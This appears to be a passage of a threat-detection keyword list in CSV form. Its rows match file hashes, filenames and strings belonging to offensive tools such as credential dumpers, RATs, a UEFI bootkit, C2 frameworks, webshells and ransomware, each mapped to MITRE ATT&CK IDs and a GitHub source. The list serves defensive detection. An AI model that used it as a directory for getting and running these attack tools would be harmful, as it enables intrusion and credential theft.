"*ef91e64b9cf910f90b8a075c87721bb46ab13cc6845697bb06c0754a98378728*",".{0,1000}ef91e64b9cf910f90b8a075c87721bb46ab13cc6845697bb06c0754a98378728.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42959"
"*ef98c122f795f0c0d7719fc02825df198cdd373ba56e17940d28ffaf13f5fce3*",".{0,1000}ef98c122f795f0c0d7719fc02825df198cdd373ba56e17940d28ffaf13f5fce3.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","42960"
"*ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896*",".{0,1000}ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42961"
"*ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924*",".{0,1000}ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","42962"
"*ef9e7ebeb7525e99f2499e07aa6313e65f23047b40f6b5ddad6f5ca5dac9a4a5*",".{0,1000}ef9e7ebeb7525e99f2499e07aa6313e65f23047b40f6b5ddad6f5ca5dac9a4a5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42964"
"*efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5*",".{0,1000}efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","42968"
"*efaca1f25f45be0e5e1dc4dc4e8827049457bbc725a4779ccf9a4a71e1763aa7*",".{0,1000}efaca1f25f45be0e5e1dc4dc4e8827049457bbc725a4779ccf9a4a71e1763aa7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42969"
"*efb9e62e4e669c34fb75f1b1c7ae27911bf6ea022f0094d4c7c33ee8c38897e6*",".{0,1000}efb9e62e4e669c34fb75f1b1c7ae27911bf6ea022f0094d4c7c33ee8c38897e6.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#filehash","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","42973"
"*efbf6ef9b05be315a4538f28b30a17bc2de051598ecb5cfd45903b1c2fdbcb73*",".{0,1000}efbf6ef9b05be315a4538f28b30a17bc2de051598ecb5cfd45903b1c2fdbcb73.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42974"
"*efbglgofoippbgcjepnhiblaibcnclgk*",".{0,1000}efbglgofoippbgcjepnhiblaibcnclgk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","42975"
"*efc8c949a728d819ac20e7f03b2ceb9924a51b10130de46424a27d4bbf242b9a*",".{0,1000}efc8c949a728d819ac20e7f03b2ceb9924a51b10130de46424a27d4bbf242b9a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42977"
"*efchatz/pandora*",".{0,1000}efchatz\/pandora.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","1","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","42978"
"*efd24e7507ef6865e7f04947fd3a18903fa8368355569ec32376d921ba2c1934*",".{0,1000}efd24e7507ef6865e7f04947fd3a18903fa8368355569ec32376d921ba2c1934.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42980"
"*efd837fd57626e278a65c495567160835dc8ddb29675c71c68c676e57bdc9b98*",".{0,1000}efd837fd57626e278a65c495567160835dc8ddb29675c71c68c676e57bdc9b98.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42981"
"*efe42a7eb08755abbb5c91b36ead35cdafbd82d1e34016046cb4be5861cb2053*",".{0,1000}efe42a7eb08755abbb5c91b36ead35cdafbd82d1e34016046cb4be5861cb2053.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","42983"
"*EFE50F0BE7CE12CB062816896427A3E1CD8B025CA218805C321882AB33520E4D*",".{0,1000}EFE50F0BE7CE12CB062816896427A3E1CD8B025CA218805C321882AB33520E4D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","42984"
"*efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1*",".{0,1000}efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","42985"
"*efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1*",".{0,1000}efe57ef897c458aef4650ca14d21160c6e685441c0b71de67b22cbe19d4ca3f1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","42986"
"*eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414*",".{0,1000}eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","42988"
"*eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81*",".{0,1000}eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42989"
"*eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae*",".{0,1000}eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42991"
"*eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae*",".{0,1000}eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42992"
"*eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae*",".{0,1000}eff99cabfd57fe3076ee55bc66dd96af5750307b7766234ccb1327b6ccde47ae.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42993"
"*effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28*",".{0,1000}effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42994"
"*EFFE3048-E904-48FD-B8C0-290E8E9290FB*",".{0,1000}EFFE3048\-E904\-48FD\-B8C0\-290E8E9290FB.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","42995"
"*EfiDSEFix.exe *",".{0,1000}EfiDSEFix\.exe\s.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42996"
"*EFIGUARD_BACKDOOR_VARIABLE_NAME*",".{0,1000}EFIGUARD_BACKDOOR_VARIABLE_NAME.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42997"
"*EfiGuard-v1.1.zip*",".{0,1000}EfiGuard\-v1\.1\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42998"
"*EfiGuard-v1.2.zip*",".{0,1000}EfiGuard\-v1\.2\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","42999"
"*EfiGuard-v1.3.zip*",".{0,1000}EfiGuard\-v1\.3\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","43000"
"*EfiGuard-v1.4.zip*",".{0,1000}EfiGuard\-v1\.4\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","43001"
"*EfiGuard-v1.5.zip*",".{0,1000}EfiGuard\-v1\.5\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","43002"
"*EfsPotato-*.exe*",".{0,1000}EfsPotato\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","43003"
"*EfsPotato*efsrpc*",".{0,1000}EfsPotato.{0,1000}efsrpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43004"
"*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43005"
"*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43006"
"*EfsPotato*lsass*",".{0,1000}EfsPotato.{0,1000}lsass.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43007"
"*EfsPotato*netlogon*",".{0,1000}EfsPotato.{0,1000}netlogon.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43008"
"*EfsPotato*samr*",".{0,1000}EfsPotato.{0,1000}samr.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43009"
"*EfsPotato.exe*",".{0,1000}EfsPotato\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43010"
"*EfsPotato-main*",".{0,1000}EfsPotato\-main.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","43011"
"*eg0he2d9cr3hpvt3z76trvkl7n2bivgscpwd5xfgn0oqgqlq00*",".{0,1000}eg0he2d9cr3hpvt3z76trvkl7n2bivgscpwd5xfgn0oqgqlq00.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#certificate","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","43012"
"*EgeBalci/amber@latest*",".{0,1000}EgeBalci\/amber\@latest.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43014"
"*EgeBalci/sgn*",".{0,1000}EgeBalci\/sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","43015"
"*EgeBalci/WSAAcceptBackdoor*",".{0,1000}EgeBalci\/WSAAcceptBackdoor.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","43016"
"*EggShell.py*",".{0,1000}EggShell\.py.{0,1000}","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","N/A","10","1693","384","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z","43017"
"*egjidjbpglichdcondbcbdnbeeppgdph*",".{0,1000}egjidjbpglichdcondbcbdnbeeppgdph.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","43018"
"*Egress-Assess Exfil Data*",".{0,1000}Egress\-Assess\sExfil\sData.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#email","email subject","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43019"
"*Egress-Assess Report*",".{0,1000}Egress\-Assess\sReport.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43020"
"*Egress-Assess transfer share*",".{0,1000}Egress\-Assess\stransfer\sshare.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43021"
"*EgressAssess With Attachment*",".{0,1000}EgressAssess\sWith\sAttachment.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#email","email body","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43022"
"*Egress-Assess.*",".{0,1000}Egress\-Assess\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43023"
"*EgressAssess.ps1*",".{0,1000}EgressAssess\.ps1.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43024"
"*Egress-Assess-master*",".{0,1000}Egress\-Assess\-master.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","43025"
"*egressbuster*",".{0,1000}egressbuster.{0,1000}","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tool","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","N/A","4","365","108","2024-07-30T16:17:48Z","2015-05-14T02:19:26Z","43026"
